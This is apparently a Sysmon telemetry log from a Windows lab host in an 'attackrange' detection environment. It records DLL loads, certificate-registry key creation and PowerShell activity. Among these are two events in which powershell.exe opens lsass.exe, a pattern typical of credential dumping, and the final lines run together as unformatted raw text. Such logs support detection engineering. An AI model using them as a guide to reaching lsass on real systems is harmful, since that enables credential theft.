1530304 | 7 ImageLoad | 2021-04-21 17:30:08.669 | C:\Windows\System32\rtutils.dll | 10.0.14393.3930 (rs1_release.200901-1914) | Routing Utilities | Microsoft® Windows® Operating System | Microsoft Corporation | RTUTILS.DLL | MD5=7F8BC94C915BD52D3422C5AD11389CEF,SHA256=68012DC490FEB77A313007FB1C3EC3F158A5C339AE620DC869B192EDAAED545B | true | Microsoft Windows | Valid
1530303 | 7 ImageLoad | 2021-04-21 17:30:08.669 | C:\Windows\System32\rasman.dll | 10.0.14393.0 (rs1_release.160715-1616) | Remote Access Connection Manager | Microsoft® Windows® Operating System | Microsoft Corporation | Rasman.dll | MD5=B07D32F44DFADC6EB9BBAFA1783B8468,SHA256=C412A22F84E06BA8B13BC53BBA263F066C0152261198FA74D6C3D7D18BB470E9 | true | Microsoft Windows | Valid
1530302 | 7 ImageLoad | 2021-04-21 17:30:08.669 | C:\Windows\System32\rasapi32.dll | 10.0.14393.4283 (rs1_release.210303-1802) | Remote Access API | Microsoft® Windows® Operating System | Microsoft Corporation | rasapi32.dll | MD5=4AD563CA721F138B52B98887B7A6F484,SHA256=054C99FD96437F0C40F8B9A6342DC80006D3509D024A9591BEBA0DD314C9FCB5 | true | Microsoft Windows | Valid
1530301 | 12 RegistryEvent | 2021-04-21 17:30:08.653 | CreateKey | HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
1530300 | 12 RegistryEvent | 2021-04-21 17:30:08.653 | CreateKey | HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
1530299 | 12 RegistryEvent | 2021-04-21 17:30:08.653 | CreateKey | HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
1530298 | 12 RegistryEvent | 2021-04-21 17:30:08.653 | CreateKey | HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
1530297 | 12 RegistryEvent | 2021-04-21 17:30:08.653 | CreateKey | HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
1530296 | 7 ImageLoad | 2021-04-21 17:30:08.653 | C:\Windows\System32\winnsi.dll | 10.0.14393.2339 (rs1_release_inmarket.180611-1502) | Network Store Information RPC interface | Microsoft® Windows® Operating System | Microsoft Corporation | winnsi.dll | MD5=25B3BD4D63460EE4599F5631C1B83D21,SHA256=07E055D47940F09CB7EB512D52672C944D7D2F035A2F45766319871C0862C5B1 | true | Microsoft Windows | Valid
1530295 | 7 ImageLoad | 2021-04-21 17:30:08.653 | C:\Windows\System32\dhcpcsvc.dll | 10.0.14393.3930 (rs1_release.200901-1914) | DHCP Client Service | Microsoft® Windows® Operating System | Microsoft Corporation | dhcpcsvc.dll | MD5=CD3B9633BBEF2102C4665A2C39EC0B1A,SHA256=341EFB4806BE39E09AA90CA3B069C39F2A9D61FA9B512350B2721D41875AFCAE | true | Microsoft Windows | Valid
1530294 | 7 ImageLoad | 2021-04-21 17:30:08.653 | C:\Windows\System32\dhcpcsvc6.dll | 10.0.14393.3930 (rs1_release.200901-1914) | DHCPv6 Client | Microsoft® Windows® Operating System | Microsoft Corporation | dhcpcsvc6.dll | MD5=1721EAC44BCFC7177AA664ADCA514F23,SHA256=C099BCCE44A04A48147DE8CF093EBF997510154113789BF31394B5148F60B375 | true | Microsoft Windows | Valid
1530293 | 12 RegistryEvent | 2021-04-21 17:30:08.653 | CreateKey | HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
1530292 | 12 RegistryEvent | 2021-04-21 17:30:08.653 | CreateKey | HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
1530291 | 7 ImageLoad | 2021-04-21 17:30:08.653 | C:\Windows\System32\nsi.dll | 10.0.14393.3297 (rs1_release_1.191001-1045) | NSI User-mode interface DLL | Microsoft® Windows® Operating System | Microsoft Corporation | nsi.dll | MD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27 | true | Microsoft Windows | Valid
1530290 | 7 ImageLoad | 2021-04-21 17:30:08.653 | C:\Windows\System32\dnsapi.dll | 10.0.14393.4350 (rs1_release.210407-2154) | DNS Client API DLL | Microsoft® Windows® Operating System | Microsoft Corporation | dnsapi | MD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9 | true | Microsoft Windows | Valid
1530289 | 7 ImageLoad | 2021-04-21 17:30:08.653 | C:\Windows\System32\IPHLPAPI.DLL | 10.0.14393.2339 (rs1_release_inmarket.180611-1502) | IP Helper API | Microsoft® Windows® Operating System | Microsoft Corporation | iphlpapi.dll | MD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B | true | Microsoft Windows | Valid
1530288 | 11 FileCreate | 2021-04-21 17:30:08.651 | C:\amsi_tracer\-176461942_powershell.exe_388_5368_3.dmp | 2021-04-21 17:30:08.650
1530287 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
1530286 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
1530285 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
1530284 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed
1530283 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed
1530282 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
1530281 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
1530280 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
1530279 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed
1530278 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
1530277 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
1530276 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
1530275 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530274 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530273 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
1530272 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
1530271 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
1530270 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed
1530269 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
1530268 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
1530267 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
1530266 | 12 RegistryEvent | 2021-04-21 17:30:08.650 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530265 | 12 RegistryEvent | 2021-04-21 17:30:08.649 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530264 | 12 RegistryEvent | 2021-04-21 17:30:08.647 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
1530263 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
1530262 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
1530261 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
1530260 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed
1530259 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed
1530258 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
1530257 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
1530256 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
1530255 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed
1530254 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
1530253 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
1530252 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
1530251 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530250 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530249 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
1530248 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
1530247 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
1530246 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed
1530245 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
1530244 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
1530243 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
1530242 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530241 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530240 | 12 RegistryEvent | 2021-04-21 17:30:08.631 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
1530239 | 7 ImageLoad | 2021-04-21 17:30:08.631 | C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\4576558f9b71a2bbc8a274844c5530c8\System.Configuration.Install.ni.dll | 4.8.3761.0 built by: NET48REL1 | .NET Framework | Microsoft® .NET Framework | Microsoft Corporation | System.Configuration.Install.dll | MD5=A8DA77D12ECE05B2F62E9C4953661141,SHA256=FC27E15E339A52EF8C0D829E7E6800365A1755A8F6DD1650018EA73CFC18996F | false | - | Unavailable
1530238 | 7 ImageLoad | 2021-04-21 17:30:08.631 | C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\41c61395b8ebbe159552045c07ea1195\Microsoft.PowerShell.Commands.Utility.ni.dll | 10.0.14393.4225 | Microsoft Windows PowerShell Utility Commands | Microsoft (R) Windows (R) Operating System | Microsoft Corporation | Microsoft.PowerShell.Commands.Utility.dll | MD5=0725A9ACB655F7C9AD6997C2C656BBF0,SHA256=B7A2F679AB9A46B2B8FD0DD65FDDE0440BE2D0457C55468D750726AA0C0C806D | false | - | Unavailable
1530237 | 11 FileCreate | 2021-04-21 17:30:08.616 | C:\amsi_tracer\-176461965_powershell.exe_388_5368_2.dmp | 2021-04-21 17:30:08.616
1530236 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
1530235 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
1530234 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
1530233 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed
1530232 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed
1530231 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
1530230 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
1530229 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
1530228 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed
1530227 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
1530226 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
1530225 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
1530224 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530223 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530222 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
1530221 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
1530220 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
1530219 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed
1530218 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
1530217 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
1530216 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
1530215 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530214 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed
1530213 | 12 RegistryEvent | 2021-04-21 17:30:08.616 | CreateKey | HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
1530212 | 11 FileCreate | 2021-04-21 17:30:08.616 | [ProcessGuid {21761711-8437-607D-CE00-00000000BB01}, ProcessId 2032, Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe] | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | 2021-04-19 13:21:25.072
1530211 | 23 FileDelete | 2021-04-21 17:30:08.616 | [ProcessGuid {21761711-8437-607D-CE00-00000000BB01}, ProcessId 2032, Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe] | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=E0E0017417657B15AB9C6350F9B953CF,SHA256=D1C389B3255111DFFC0960AAC4BE60C4D65E7979A98E26943ED9605F30ABE962 | false | false - insufficient disk space
1530210 | 11 FileCreate | 2021-04-21 17:30:08.600 | [ProcessGuid {21761711-8437-607D-CE00-00000000BB01}, ProcessId 2032, Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe] | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | 2021-04-19 13:21:25.072
1530209 | 23 FileDelete | 2021-04-21 17:30:08.600 | [ProcessGuid {21761711-8437-607D-CE00-00000000BB01}, ProcessId 2032, Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe] | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=181FD06ED426C5D3DEE6CA991709D795,SHA256=726A8196CFA937C145CE19F6ABBEB36381B7B594F86AB6D77CD040FD37EAB716 | false | false - insufficient disk space
1530208 | 11 FileCreate | 2021-04-21 17:30:08.585 | C:\amsi_tracer\-176461996_powershell.exe_388_5368_1.dmp | 2021-04-21 17:30:08.585
1530207 | 7 ImageLoad | 2021-04-21 17:30:08.569 | C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\7ab98d11d73082b7d4da412e9164824c\Microsoft.CSharp.ni.dll | 4.8.3761.0 | Microsoft.CSharp.dll | Microsoft® .NET Framework | Microsoft Corporation | Microsoft.CSharp.dll | MD5=B9E34CEC4D766AFE6195FCDD5C265721,SHA256=E1D7D03019EFE1A8247C17C2575F647A7FF7E0B6C9CB9996BA29EBB8F9A8C303 | false | - | Unavailable
1530206 | 10 ProcessAccess | 2021-04-21 17:30:08.553 | {21761711-83AD-607D-0B00-00000000BB01} | 6287724 | C:\Windows\system32\lsass.exe | {21761711-6120-6080-BB5D-00000000BB01} | 388 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 0x1478 | C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
1530205 | 10 ProcessAccess | 2021-04-21 17:30:08.553 | {21761711-83AD-607D-0B00-00000000BB01} | 6287724 | C:\Windows\system32\lsass.exe | {21761711-6120-6080-BB5D-00000000BB01} | 388 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 0x1000 | C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
1530204 | 7 ImageLoad | 2021-04-21 17:30:08.553 | C:\Windows\System32\secur32.dll | 10.0.14393.2273 (rs1_release_1.180427-1811) | Security Support Provider Interface | Microsoft® Windows® Operating System | Microsoft Corporation | secur32.dll | MD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5 | true | Microsoft Windows | Valid
1530203 | 7 ImageLoad | 2021-04-21 17:30:08.553 | C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\a8f3d26344af855ac6daa7367566ac6a\System.Configuration.ni.dll | 4.8.4190.0 built by: NET48REL1LAST_B | System.Configuration.dll | Microsoft® .NET Framework | Microsoft Corporation | System.Configuration.dll | MD5=B0386808CBC978446F0D8638C53F9F02,SHA256=7E05166D981CF6FA3157EE088305E2B901B9721FCED6370E9D1CE7511A71AC64 | false | - | Unavailable
1530202 | 7 ImageLoad | 2021-04-21 17:30:08.553 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | 4.8.3761.0 built by: NET48REL1 | .NET Framework | Microsoft® .NET Framework | Microsoft Corporation | system.transactions.dll | MD5=D17E11DDF716089AF736DBA7C4F24C75,SHA256=DF301F2F2A735A1A75EAE79E64CCFDAD335E319B98316E9E875F726FA2CB51D5 | true | Microsoft Corporation | Valid
1530201 | 7 ImageLoad | 2021-04-21 17:30:08.553 | C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\5351712e9f473d097f2b738b204273dc\System.Transactions.ni.dll | 4.8.3761.0 built by: NET48REL1 | .NET Framework | Microsoft® .NET Framework | Microsoft Corporation | system.transactions.dll | MD5=B419B44AAD97CA3AA622FC69F9F700EF,SHA256=85E6B77303F3C2B52190AD6ECB73FFF9A6EB42C02D61D315128653B8D806ED7F | false | - | Unavailable
1530200 | 7 ImageLoad | 2021-04-21 17:30:08.553 | C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\03eb557dfba7aa3116a9751f0bc35bf0\Microsoft.PowerShell.Security.ni.dll | 10.0.14393.2848 | Microsoft Windows PowerShell Management Commands | Microsoft (R) Windows (R) Operating System | Microsoft Corporation | Microsoft.PowerShell.Security.dll | MD5=5BE2CDD8A7DADF9FB9B3F1FF93B2BAA4,SHA256=CBCD70497678A47433F4C5E24A2C801B761F5A551335F827D9C3564FBEE0B40C | false | - | Unavailable
1530199 | 7 ImageLoad | 2021-04-21 17:30:08.551 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll | 4.8.4311.0 built by: NET48REL1LAST_B | Microsoft .NET Runtime Just-In-Time Compiler | Microsoft® .NET Framework | Microsoft Corporation | clrjit.dll | MD5=A85C78EB12A7B14526FEBE70EC52184B,SHA256=B240619E85EA26E3412AD8A47D7707509D61A04CAFAEC83325445B62014310D7 | true | Microsoft Corporation | Valid
1530198 | 17 PipeEvent | 2021-04-21 17:30:08.531 | CreatePipe | \PSHost.132634998084015049.388.DefaultAppDomain.powershell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1530197 | 12 RegistryEvent | 2021-04-21 17:30:08.531 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
1530196 | 12 RegistryEvent | 2021-04-21 17:30:08.531 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
1530195 | 12 RegistryEvent | 2021-04-21 17:30:08.531 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
1530194 | 12 RegistryEvent | 2021-04-21 17:30:08.531 | CreateKey | HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed
12241200x80000000000000001530193Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530192Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530191Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530190Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530189Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530188Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.531{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530187Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
